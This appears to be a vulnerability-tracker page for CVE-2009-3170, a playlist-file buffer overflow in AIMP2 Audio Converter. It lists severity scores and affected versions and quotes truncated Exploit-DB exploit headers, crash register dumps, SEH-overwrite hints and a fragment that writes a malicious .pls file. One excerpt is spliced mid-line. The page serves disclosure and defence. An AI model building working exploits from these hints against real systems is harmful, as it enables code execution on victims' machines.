CVE-2009-3170
published 2009-09-11CVE-2009-3170: Stack-based buffer overflow in AIMP2 Audio Converter 2.53 (build 330) and earlier allows remote attackers to cause a denial of service (crash) or possibly…
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
15.35%
96.4th percentile
Stack-based buffer overflow in AIMP2 Audio Converter 2.53 (build 330) and earlier allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long File1 argument in a (1) .pls or (2) .m3u playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aimp | aimp2_audio_converter | <= 2.53 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow
exploitdb·2009-11-21
CVE-2009-3170 AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow
AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow
---
#!/usr/bin/python
#
# ######################################################################
# Author contact : seeleymagic[at]hotmail[dot]com
# ######################################################################
#
# *** For educational purposes only ***
# You have been warned
#
# My original crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#
# The Info:
#
# I knew this exploit was always possible, but I failed to have the know
Exploit-DB
AIMP2 Audio Converter - Playlist Overflow (SEH)
exploitdb·2009-11-16
CVE-2009-3170 AIMP2 Audio Converter - Playlist Overflow (SEH)
AIMP2 Audio Converter - Playlist Overflow (SEH)
---
# Exploit Title : AIMP2 Audio Converter Playlist (pls) BOF
# Discovered by : mr_me (http://milw0rm.com/exploits/9561)
# Author : corelanc0d3r
# Author contact : (corelanc0d3r[at]gmail[dot]com) | http://www.corelan.be:8800
# Date : nov 7th, 2009
# Type : local and remote code execution
# OS : Windows
# Product : AIMP2 Audio Converter (aimp2c.exe)
# Version : aimp2sploit.pls');
print myfile $payload;
print "Wrote " . length($payload)." bytes to aimp2sploit.pls\n";
close(myfile);
Exploit-DB
AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)
exploitdb·2009-09-01
CVE-2009-3170 AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)
AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)
---
#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000
2009-09-11
Published